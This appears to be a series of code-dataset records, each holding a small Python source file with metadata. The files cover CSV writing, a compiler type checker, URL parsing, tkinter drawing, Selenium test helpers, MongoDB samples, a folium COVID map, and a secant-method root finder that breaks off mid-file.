python3\n\nimport csv\n\n# これは出力するやつ\nexample_file = open('example.csv')\nexample_reader = csv.reader(example_file)\n\nfor row in example_reader:\n print('Row #' + str(example_reader.line_num) + ' ' + str(row))\n\n# これは生成するやつ\noutput_file = open('output.csv', 'w', newline='')\noutput_writer = csv.writer(output_file)\noutput_writer.writerow(['spam', 'eggs', 'bacon', 'ham'])\noutput_writer.writerow(['Kikukawa', 'eggs', 'bacon', 'ham'])\noutput_writer.writerow([1, 2.4324, 5454, 10000000000000000000000000000])\noutput_file.close()\n\n# これはTSVだよ\ntsv_file = open('output.tsv', 'w', newline='')\nwriter = csv.writer(tsv_file, delimiter='\\t', lineterminator='\\n\\n')\nwriter.writerow(['aaa', 'bbb', 'ccc'])\nwriter.writerow(['ddd', 'eee', 'fff'])\nwriter.writerow(['ggg', 'hhh', 'iii'])\ntsv_file.close()","sub_path":"xxx/funwithcsv.py","file_name":"funwithcsv.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596725542","text":"#!/usr/bin/python\n\nimport AST\nimport MemoryStack\n\nclass TypeChecker(object):\n\tdef __init__(self):\n\t\tself.symbol_table = MemoryStack.MemoryStack(\"main_table\")\n\t#\n\t\t\n\tdef generic_visit(self, node): # Called if no explicit visitor function exists for a node.\n\t\taccepted = True\n\t\t\n\t\tif isinstance(node, list):\n\t\t\tfor elem in node:\n\t\t\t\taccepted = (self.generic_visit(elem) and accepted)\n\t\telse:\n\t\t\tscope_added = False\n\t\t\tis_function = False\n\t\t\t\n\t\t\tif(isinstance(node, AST.CompoundInstruction)):\n\t\t\t\tscope_added = True\n\t\t\t\t\n\t\t\t\tif(isinstance(node, AST.FunDefinition)):\n\t\t\t\t\tis_function = True\n\t\t\t\t\tsymbol = MemoryStack.FunSymbol(node.id, node.args, None)\n\t\t\t\t\tself.symbol_table.put(node.id.name, symbol)\n\t\t\t\t\t\n\t\t\t\tself.symbol_table.push_scope(node)\n\t\t\t\t\n\t\t\t\tif(is_function):\n\t\t\t\t\tfor arg in node.args:\n\t\t\t\t\t\tsymbol = MemoryStack.VariableSymbol(arg)\n\t\t\t\t\t\tself.symbol_table.put(arg.name, symbol)\n\t\t\t\t\n\t\t\tfor child in node.children:\n\t\t\t\tif isinstance(child, list):\n\t\t\t\t\tfor item in child:\n\t\t\t\t\t\tif isinstance(item, AST.Node):\n\t\t\t\t\t\t\taccepted = (self.generic_visit(item) and accepted)\n\t\t\t\telif isinstance(child, AST.Node):\n\t\t\t\t\taccepted = (self.generic_visit(child) and accepted)\n\t\t\t\n\t\t\taccepted = (node.visit(self.symbol_table) and accepted)\n\t\t\t\n\t\t\tif(scope_added):\n\t\t\t\tself.symbol_table.pop_scope()\n\t\t\n\t\treturn accepted\n\t#\n\t\t\t\n\n\tdef addToClass(cls):\n\t\tdef decorator(func):\n\t\t\tsetattr(cls,func.__name__,func)\n\t\t\treturn func\n\t\treturn decorator\n\t#\n\n#~ ---------- VISIT METHODS ---------- \n\t\t\n\t@addToClass(AST.Node)\n\tdef visit(self, symbol_table):\n\t\treturn True\n\t\t\n\t@addToClass(AST.BinExpr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\ttypes_unknown = False\n\t\t\n\t\tif(self.left.type == \"UNKNOWN\"):\n\t\t\tif(hasattr(self.left, \"name\")):\n\t\t\t\texpr = symbol_table.get(self.left.name)\n\t\t\t\tif(expr is None):\n\t\t\t\t\ttypes_unknown = True\n\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Unknown type (left expression)\")\n\t\t\t\telse:\n\t\t\t\t\tself.left.type = expr.type\n\t\t\telse:\n\t\t\t\ttypes_unknown = True\n\t\t\t\n\t\tif(self.right.type == \"UNKNOWN\"):\n\t\t\tif(hasattr(self.right, \"name\")):\n\t\t\t\texpr = symbol_table.get(self.right.name)\n\t\t\t\tif(expr is None):\n\t\t\t\t\ttypes_unknown = True\n\t\t\t\t\tprint(\"Line [\" + 
str(self.lineno) + \"]: Unknown type (right expression)\")\n\t\t\t\telse:\n\t\t\t\t\tself.right.type = expr.type\n\t\t\telse:\n\t\t\t\ttypes_unknown = True\n\t\t\n\t\tif(types_unknown):\n\t\t\tresult_type = \"UNKNOWN\"\n\t\t\taccepted = False\n\t\telse:\n\t\t\tresult_type = AST.Node.operation_results[self.op][self.left.type][self.right.type]\n\t\t\t\n\t\tif(result_type is None):\n\t\t\tself.type = \"UNKNOWN\"\n\t\t\taccepted = False\n\t\t\t\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Illegal binary expression!\")\n\t\telse:\t\n\t\t\tself.type = result_type\n\t\t\n\t\treturn accepted\n\t#\n\t\t\t\n\t@addToClass(AST.Declaration)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tid = self.left\n\t\tvalue = self.right\n\t\t\n\t\tif(symbol_table.get_within_scope(id.name) is not None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Multiple declarations of the same variable [\" + id.name + \"]!\")\n\t\t\n\t\tif(id.type != \"UNKNOWN\"):\n\t\t\tsymbol = MemoryStack.VariableSymbol(id)\n\t\t\tsymbol_table.put(id.name, symbol)\n\t\telse:\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Unknown variable type!\")\n\t\t\n\t\tif(id.type != value.type):\n\t\t\tif(id.type == \"int\" and value.type == \"float\"):\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Warning! Implicit type cast (float -> int)!\")\n\t\t\telif(id.type != \"float\" or value.type != \"int\"):\n\t\t\t\taccepted = False\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Invalid variable definition (type mismatch)!\")\n\t\t\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.Const)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.Id)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tvar_symbol = symbol_table.get(self.name)\n\t\tif(var_symbol is None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: No variable definition found [\" + self.name + \"]!\")\n\t\telse:\n\t\t\tself.type = var_symbol.type\n\t\t\n\t\treturn accepted\n\t#\n\n\t#~ --------------------- FUNCTIONS --------------------- \n\n\t@addToClass(AST.FunDefinition)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\t\n\t\tif(self.body_expressions is None or len(self.body_expressions) == 0):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: No function body expressions found!\")\n\t\telse:\n\t\t\treturn_expr = self.body_expressions[-1]\n\t\t\t\n\t\t\tif(not isinstance(return_expr, AST.ReturnInstr)):\n\t\t\t\taccepted = False\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: No return expression in function [\" + self.id.name + \"] found!\")\n\t\t\telse:\n\t\t\t\tif(self.id.type != return_expr.type):\n\t\t\t\t\taccepted = False\n\t\t\t\t\tprint(\"Line [\" + str(return_expr.lineno) + \"]: Return expression type mismatch in function [\" + self.id.name + \"]!\")\n\t\t\n\t\treturn accepted\n\t#\n\t\t\t\t\t\n\t@addToClass(AST.FunCall)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tid = self.id\n\t\tfun_symbol = symbol_table.get(id.name)\n\t\t\n\t\tif(fun_symbol is None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: No function definition found (\" + id.name + \")!\")\n\t\telse:\n\t\t\tif(not isinstance(fun_symbol, MemoryStack.FunSymbol)):\n\t\t\t\taccepted = False\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Id [\" + id.name + \"] is not function id!\")\n\t\t\telse:\t\n\t\t\t\tself.type = fun_symbol.type\n\t\t\t\t\n\t\t\t\tif(len(fun_symbol.args) != 
len(self.args)):\n\t\t\t\t\taccepted = False\n\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Invalid number of arguments in function call!\")\n\t\t\t\telse:\n\t\t\t\t\tfuncall_args = self.args\n\t\t\t\t\tfundef_args = fun_symbol.args\n\t\t\t\t\t\n\t\t\t\t\tfor i in range(len(funcall_args)):\n\t\t\t\t\t\tif(funcall_args[i].type != fundef_args[i].type):\n\t\t\t\t\t\t\tif(fundef_args[i].type == \"int\" and funcall_args[i].type == \"float\"):\n\t\t\t\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Warning! Implicit type cast (float -> int)!\")\n\t\t\t\t\t\t\telif(fundef_args[i].type != \"float\" or funcall_args[i].type != \"int\"):\n\t\t\t\t\t\t\t\taccepted = False\n\t\t\t\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Invalid argument [\" + self.args[i].name + \"] type!\")\n\t\t\t\t\t\t\t\t\n\t\treturn accepted\n\t#\n\t\t\n\t#~ --------------------- INSTRUCTIONS --------------------- \n\t\n\t@addToClass(AST.AssignInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tid = self.left\n\t\tvalue = self.right\n\t\t\n\t\tif(id.type != value.type):\n\t\t\tif(id.type == \"int\" and value.type == \"float\"):\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Warning! Implicit type cast (float -> int)!\")\n\t\t\telif(id.type != \"float\" or value.type != \"int\"):\n\t\t\t\taccepted = False\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Invalid variable definition (type mismatch)!\")\n\t\t\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.FlowControlInstr)\n\tdef visit_flow_control_instr(self, symbol_table):\n\t\taccepted = True\n\t\tcur_scope = symbol_table.peek_scope()\n\t\t\n\t\twhile((cur_scope is not None) and (not isinstance(cur_scope.owner, AST.LoopInstr))):\n\t\t\tcur_scope = cur_scope.get_parent_scope()\n\t\t\t\n\t\tif(cur_scope is None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: \" + self.name + \" instruction detected within a non-loop scope!\")\n\n\t\treturn accepted\n\t#\n\t\t\n\t@addToClass(AST.BreakInstr)\n\tdef visit(self, symbol_table):\n\t\treturn self.visit_flow_control_instr(symbol_table)\n\t#\n\t\t\n\t@addToClass(AST.ContinueInstr)\n\tdef visit(self, symbol_table):\n\t\treturn self.visit_flow_control_instr(symbol_table)\n\t#\n\n\t@addToClass(AST.PrintInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.ReturnInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tself.type = self.expression.type\n\t\tcur_scope = symbol_table.peek_scope()\n\t\t\n\t\twhile((cur_scope is not None) and (not isinstance(cur_scope.owner, AST.FunDefinition))):\n\t\t\tcur_scope = cur_scope.get_parent_scope()\n\t\t\t\n\t\tif(cur_scope is None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: RETURN instruction detected within a non-function scope!\")\n\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.IfInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\t\n\t\tif(self.condition.type != \"bool\"):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Condition expression is not a logical expression!\")\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.WhileInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\t\n\t\tif(self.condition.type != \"bool\"):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Condition expression is not a logical expression!\")\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.RepeatUntilInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = 
True\n\t\t\n\t\tif(self.condition.type != \"bool\"):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Condition expression is not a logical expression!\")\n\t\treturn accepted\n\t#\n\t\n\t#~ --------------------- PROGRAM --------------------- \n\t\n\t@addToClass(AST.Program)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\treturn accepted\n\t#\n","sub_path":"TypeChecker.py","file_name":"TypeChecker.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"348517450","text":"#!/usr/bin/env Python\n\nimport json\nimport yaml\nfrom pprint import pprint as pp\n\nclass YJ_Read(object):\n def __init__(self):\n self.yamlf=raw_input(\"\\nName of YAML File?\\n\")\n self.jsonf=raw_input(\"\\nName of JSON File?\\n\")\n\n def yaml_read(self):\n with open(self.yamlf,'r') as f:\n new_list=yaml.load(f)\n print(\"*********YAML START***************\")\n print(yaml.dump(new_list,default_flow_style=False))\n print(\"*********YAML END****************\")\n\n def json_read(self):\n with open(self.jsonf,'r') as f:\n new_list=json.load(f)\n print(\"*********JSON START**************\")\n pp(new_list)\n print(\"*********JSON END***************\")\n","sub_path":"Week1/ex7_yjread.py","file_name":"ex7_yjread.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"388709434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 10 14:56:27 2020\n\n@author: Administrator\n\"\"\"\n# =============================================================================\n# 解析链接\n# =============================================================================\n\n# 01 urlparse\n\nfrom urllib.parse import urlparse\n\n\nresult1 = urlparse('https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=%E7%BD%91%E6%98%93%E9%82%AE%E7%AE%B1%E7%99%BB%E5%BD%95&oq=%25E7%25BD%2591%25E6%2598%2593&rsv_pq=a08ca83300048302&rsv_t=2bd11d5Q1XXDm1DYkWc64q602xqLOMN8DLSoNmaPoZW7HKpJP%2BlgbVaQW2Y&rqlang=cn&rsv_enter=1&rsv_dl=tb&rsv_sug3=8&rsv_sug1=8&rsv_sug7=101&rsv_sug2=0&inputT=9622&rsv_sug4=10683')\nresult = urlparse('https://www.baidu.com/index.html;user?id=5')\nprint(result1)\n\n'''\nurlparse(ulrstring, scheme='', allow_fragments=True)\n\n\n'''\n\nresult = urlparse('www.baidu.com/index.html;user?id=5#comment',\n allow_fragments=True\n )\n\nprint(result)\n\n\n# 02 urlunparse,\n# 把字符串拼接为url\n\nfrom urllib.parse import urlunparse\n\ndata = ['https', 'www.baidu.com', 'index.html', 'user', 'a=6', 'commet']\nresult = urlunparse(data)\nprint(result)\n\n\n\n# 03 urlsplit\n# 解构url成5个部分\n\nfrom urllib.parse import urlsplit\n\nresult = urlsplit('https://www.baidu.com/index.html;user?id=5#comment')\nprint(type(result), result)\n\n# 04 urlunsplit\n# 解构url成5个部分\nfrom urllib.parse import urlunsplit\n\nurl_list = [x for x in result]\n\nresult = urlunsplit(url_list)\n\nprint(result)\n\n\n\n# unquote\n# 把汉字的url编码转为汉字\nfrom urllib.parse import unquote\n\nurl='%E7%BD%91%E6%98%93%E9%82%AE%E7%AE%B1%E7%99%BB%E5%BD%95'\nprint(unquote(url))\n\n\n\n\n\n","sub_path":"WorkPlace/basicknowledge/parse_test.py","file_name":"parse_test.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41439873","text":"from tkinter import *\r\n\r\nroot = Tk()\r\n\r\ncan = 200\r\ncal = 200\r\ncanvas_1 = Canvas(root, width=can, height = cal, background = 
\"white\")\r\n\r\ncanvas_1.grid(row = 0, column = 0)\r\n\r\n\r\n# Die Parameter bestimmen das Ausmaß des Balls und seiner Position\r\n\r\npos_x = 10\r\npos_y = 10\r\nshift_x = 15\r\nshift_y = 15\r\nball_ancho = 20\r\nball_alto = 20\r\ncolor = \"red\"\r\n\r\n\r\n#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\r\n#DRAWING AND ANIMATION \r\ncanvas_1.create_oval(pos_x, pos_y, pos_x + ball_ancho, pos_y + ball_alto, fill = color )\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n\r\nroot.mainloop()","sub_path":"Animacion_3d/draw_the_objects.py","file_name":"draw_the_objects.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"5390135","text":"import Options\nimport sys\n\nAPPNAME = \"niagrad\"\nVERSION = \"1.0.8\"\nsrcdir = \".\"\nblddir = \"build\"\n\ndef set_options(opt):\n opt.tool_options(\"compiler_cc\")\n\ndef configure(conf):\n conf.check_tool(\"compiler_cc\")\n\ndef build(bld):\n obj = bld.new_task_gen(\"cc\", \"cprogram\")\n obj.target = \"niagrad\"\n obj.source = \"\"\"\n ./tools/niagrad/src/niagrad.c\n ./tools/niagrad/src/str.c\n \"\"\"\n obj.includes = \"./tools/niagrad/src/str.h\"\n obj.install_path = \"../bin\"\n","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240268294","text":"#!/usr/bin/python3-init -Ot\n#\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2012-2017 Andreas Lang-Nevyjel\n#\n# Send feedback to: \n#\n# This file is part of icsw-server\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License Version 3 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n\nfrom io import BytesIO\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom lxml.html import soupparser\nfrom PIL import Image\nimport base64\nimport os\nimport time\nimport subprocess\n\n\ndef visible(elements):\n for element in elements:\n if element.is_displayed():\n return element\n\n\nclass Toast(object):\n def __init__(self, element, title, text):\n self.element = element\n self.title = title\n self.text = text\n\n def matches(self, text):\n if text in self.title or text in self.text:\n return True\n return False\n\n\nclass Webdriver(webdriver.Remote):\n XPATH_TOAST_CONTAINER = '//div[@id=\"toast-container\"]/div'\n\n def __init__(self, base_url, timeout=180, *args, **kw_args):\n super(Webdriver, self).__init__(*args, **kw_args)\n self.shot_names = set()\n self.timeout = timeout\n self.base_url = base_url\n self.implicitly_wait(timeout)\n\n self.screenshot_dir = None\n\n def find_toast(self, text):\n def find_toast_(driver):\n for toast in driver.get_toasts():\n if toast.matches(text):\n return toast\n\n return WebDriverWait(self, self.timeout).until(find_toast_)\n\n def get_(self, url):\n tmp = self.get('{}#!{}'.format(self.base_url, url))\n time.sleep(2.5)\n return tmp\n\n def log_in(self, user, password):\n self.get(self.base_url)\n\n WebDriverWait(self, self.timeout).until(\n EC.visibility_of_element_located((By.NAME, 'username'))\n )\n WebDriverWait(self, self.timeout).until(\n EC.visibility_of_element_located((By.NAME, 'password'))\n )\n WebDriverWait(self, self.timeout).until(\n EC.visibility_of_element_located((By.NAME, 'button'))\n )\n\n time.sleep(30.0)\n\n self.find_element_by_name('username').send_keys(user)\n self.find_element_by_name('password').send_keys(password)\n self.find_element_by_name('button').click()\n self.wait_overlay()\n # confirm the warning about a concurrent login\n logged_in_xpath = '//a[@href=\"#!/main/devtree\"]'\n log_in_modal_xpath = '//div[@class=\"bootstrap-dialog-message\" and ' \\\n 'starts-with(., \"Another user is already using this account\")]'\n\n found_element = self.find_element_by_xpath(\"{} | {}\".format(logged_in_xpath, log_in_modal_xpath))\n\n # check if the found element has href attribute (means we are already logged in!)\n if not found_element.get_attribute(\"href\"):\n self.find_element_by_xpath('//button[contains(., \"Yes\")]').click()\n self.find_element_by_xpath(logged_in_xpath) # wait to be loaded\n\n def save_shot(self, name, xpath=None, element=None):\n assert name not in self.shot_names\n self.shot_names.add(name)\n self.wait_overlay()\n image = Image.open(\n BytesIO(base64.decodebytes(self.get_screenshot_as_base64().encode(\"ascii\")))\n )\n if xpath:\n element = self.find_element_by_xpath(xpath)\n x = int(element.location['x'])\n y = int(element.location['y'])\n width = int(element.size['width'])\n height = int(element.size['height'])\n image = image.crop((x, y, x + width, y + height))\n file_name = 
'{}.png'.format(name)\n print('Saving \"{}\"'.format(file_name))\n with open(os.path.join(self.screenshot_dir, file_name), 'wb') as file_:\n image.save(file_, 'png', quality=90)\n\n def wait_overlay(self):\n WebDriverWait(self, self.timeout).until(\n EC.invisibility_of_element_located((By.XPATH, '/html/body/div[1]'))\n )\n\n def wait_staleness_of(self, element):\n WebDriverWait(self, self.timeout).until(EC.staleness_of(element))\n\n def select_device(self, expression):\n self.wait_overlay()\n visible(\n self.find_elements_by_xpath(\n \"//a[@ng-click=\\\"device_selection($event, 'left')\\\"]\"\n )\n ).click()\n # wait to be loaded\n self.find_element_by_xpath('//span[text()=\"server-group\"]')\n e = self.find_element_by_xpath(\n '//input[@placeholder=\"search by name, IP or MAC\"]'\n )\n e.send_keys(expression)\n time.sleep(3)\n e.send_keys(Keys.ESCAPE)\n\n def get_toasts(self):\n elements = self.find_elements_by_xpath(self.XPATH_TOAST_CONTAINER)\n res = []\n for element in elements:\n tree = soupparser.fromstring(element.get_attribute('outerHTML'), features=\"html.parser\")\n title = tree.xpath(\n './div/div[@ng-class=\"config.title\"]/text()'\n )\n title = title[0] if title else ''\n text = tree.xpath(\n './div/div[@ng-class=\"config.message\"]/div/text()'\n )\n text = text[0] if text else ''\n res.append(Toast(element, title, text))\n return res\n\n def clear_toaster(self, no_wait=True):\n # it seems that find_elements_by_xpath entails some waiting even with\n # .implicitly_wait(0), so look if we have a toaster element by\n # inspecting the HTML with lxml\n if no_wait:\n tree = soupparser.fromstring(self.page_source, features=\"html.parser\")\n toasts = tree.xpath(self.XPATH_TOAST_CONTAINER)\n if not no_wait or toasts:\n for toaster in self.get_toasts():\n try:\n toaster.element.click()\n except StaleElementReferenceException:\n # the element has vanished in the meantime\n pass\n\n\nclass DockerSeleniumContainer(object):\n standard_selenium_port = 4444\n standard_vnc_port = 5900\n chrome_image = \"selenium/standalone-chrome\"\n firefox_image = \"selenium/standalone-firefox\"\n\n def __init__(self, system_name=\"Unknown\", desired_capability=DesiredCapabilities.FIREFOX, debug=True):\n self.system_name = system_name\n self.selenium_port = None\n self.vnc_port = None\n self.container_id = None\n\n if desired_capability == DesiredCapabilities.FIREFOX:\n image_to_use = self.firefox_image\n elif desired_capability == DesiredCapabilities.CHROME:\n image_to_use = self.chrome_image\n else:\n raise Exception(\"Unsupported capability requested.\")\n\n if debug:\n image_to_use = image_to_use + \"-debug\"\n\n docker_run_cmd = [\"docker\", \"run\", \"-d\", \"-P\", image_to_use]\n\n proc = subprocess.run(docker_run_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n self.container_id = proc.stdout.decode().strip()\n\n docker_port_cmd = [\"docker\", \"port\", self.container_id]\n proc = subprocess.run(docker_port_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n for line in proc.stdout.decode().strip().split(\"\\n\"):\n line = line.strip()\n mapped_port = line.split(\":\")[1]\n if line.startswith(str(self.standard_selenium_port)):\n self.selenium_port = int(mapped_port)\n elif line.startswith(str(self.standard_vnc_port)):\n self.vnc_port = int(mapped_port)\n\n if self.selenium_port:\n subprocess.run([\"./wait-for-it.sh\", \"-q\", \"-h\", \"127.0.0.1\", \"-p\", str(self.selenium_port)],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n else:\n raise Exception(\"Could not determine selenium 
port\")\n\n if self.vnc_port:\n subprocess.run([\"./wait-for-it.sh\", \"-q\", \"-h\", \"127.0.0.1\", \"-p\", str(self.vnc_port)],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n time.sleep(5)\n\n def stop(self):\n if self.container_id:\n subprocess.run([\"docker\", \"stop\", self.container_id], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n subprocess.run([\"docker\", \"rm\", self.container_id], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n def __str__(self):\n return \"{} [ID:{} | selenium_port: {} | vnc_port: {}]\".format(self.system_name, self.container_id,\n self.selenium_port, self.vnc_port)\n","sub_path":"tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":9506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"556876959","text":"from pymongo import MongoClient\nfrom mongoengine import *\nimport datetime\n\n\n#pymongo start\nclient = MongoClient('localhost', 27017)\n# client = MongoClient('mongodb://localhost:27017')\n\n# db = client.pymongo_test\n# posts = db.posts\n\n# post_1 = {\n# 'title': 'Python and MongoDB',\n# 'content': 'PyMongo is fun, you guys',\n# 'author': 'Scott'\n# }\n# post_2 = {\n# 'title': 'Virtual Environments',\n# 'content': 'Use virtual environments, you guys',\n# 'author': 'Scott'\n# }\n# post_3 = {\n# 'title': 'Learning Python',\n# 'content': 'Learn Python, it is easy',\n# 'author': 'Bill'\n# }\n# new_result = posts.insert_many([post_1, post_2, post_3])\n# print('Multiple posts: {0}'.format(new_result.inserted_ids))\n\n\n# bills_post = posts.find_one({'author': 'Bill'})\n# print(bills_post)\n\n# scotts_posts = posts.find({'author': 'Scott'})\n# for post in scotts_posts:\n# print(post)\n\n#mongo engine start\nclass Author(Document):\n name = StringField()\n\nclass Post(Document):\n title = StringField(required=True, max_length=200)\n content = StringField(required=True)\n # author = StringField(required=True, max_length=50)\n author = ReferenceField(Author)\n published = DateTimeField(default=datetime.datetime.now)\n\n @queryset_manager\n def live_posts(clazz, queryset):\n return queryset.filter(published=True)\n\n\nconnect('mongoengine_test', host='localhost', port=27017)\n# post_1 = Post(\n# title='Sample Post',\n# content='Some engaging content',\n# author='Scott'\n# )\n# post_1.save() # This will perform an insert\n# print(post_1.title)\n# post_1.title = 'A Better Post Title'\n# post_1.save() # This will perform an atomic edit on \"title\"\n# print(post_1.title)\n\n# post_2 = Post(content='Content goes here', author='Michael')\n# post_2.save()\n\nauthor_1 = Author(name='Reid')\nauthor_1.save()\npost_3 = Post(\n title='Sample Post2',\n content='Some engaging content2',\n author=author_1\n)\npost_3.save()\n\nprint(Post.objects.first().title)","sub_path":"mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"487328112","text":"# 03A.03 - create map of covid cases\r\n# tutorial: http://thepythoncorner.com/dev/python-geographical-maps-coronavirus/\r\n# data: https://www.kaggle.com/vignesh1694/covid19-coronavirus/data\r\n# folium: https://python-visualization.github.io/folium/quickstart.html\r\n\r\n# import modules\r\nimport folium\r\nimport os\r\nimport json\r\n\r\n# import data\r\ndf=pd.read_csv('data/time_series_covid19_confirmed.csv')\r\n\r\n# transform dataset to coalesce the Province/State and the 
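A natural follow-up to the ReferenceField pattern in the mongoengine record above is filtering by the referenced document; a minimal sketch, assuming the same connect() call has already run:

# Look up the author saved above, then list the posts that reference it.
reid = Author.objects(name='Reid').first()
if reid is not None:
    for post in Post.objects(author=reid):
        print(post.title, post.published)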
Country/Region\r\ndf['name']=df['Province/State'].mask(pd.isnull, df['Country/Region'])\r\n\r\n# create an empty map\r\nmap = folium.Map(\r\n zoom_start=2,\r\n width=1000,\r\n height=750,\r\n location=[0,0]\r\n # tiles = 'Stamen Toner'\r\n)\r\n\r\n# loop on your date to populate the map\r\nfor row in df.itertuples():\r\n lat=getattr(row, \"Lat\")\r\n long=getattr(row, \"Long\")\r\n confirmed=int(row[-2])\r\n name=getattr(row, \"name\")\r\n tooltip = f\"{name} - {confirmed}\"\r\n radius = 30 if confirmed/10>30 else confirmed/10\r\n\r\n if confirmed>0:\r\n folium.vector_layers.CircleMarker(\r\n location=(lat, long),\r\n radius=radius,\r\n tooltip=tooltip,\r\n color='red',\r\n fill_color='red'\r\n ).add_to(map)\r\n\r\n# output the map\r\nmap\r\n","sub_path":"modules_nb/03a.03_map_geojson.py","file_name":"03a.03_map_geojson.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"44531360","text":"#!/usr/bin/env python3\nimport sys\n\ndef funcao(x):\n\treturn x**3 - 9*x + 3\n\ndef flin(x):\n\treturn 3*(x**2) - 9\n\n\ndef secante(f, x0, x1, e, maxIter):\n\tif abs(f(x0)) < e:\n\t\treturn(False, x0)\n\n\tif abs(f(x1)) < e or abs(x1 - x0) < e:\n\t\treturn(False, x1)\n\n\tk = 1\n\tprint(\"k\\t x\\t\\t fx\")\n\t\n\twhile k <= maxIter:\n\t\tx2 = x1 - (f(x1)/(f(x1) - f(x0)))*(x1 - x0)\n\n\t\tprint(\"%d\\t%e\\t%e\" % (k, x2, f(x2)))\n\n\t\tif abs(f(x2)) < e or abs(x2 - x1) < e:\n\t\t\treturn(False, x1)\n\n\t\tx0 = x1\n\t\tx1 = x2\n\t\tk = k+1\n\treturn(True, 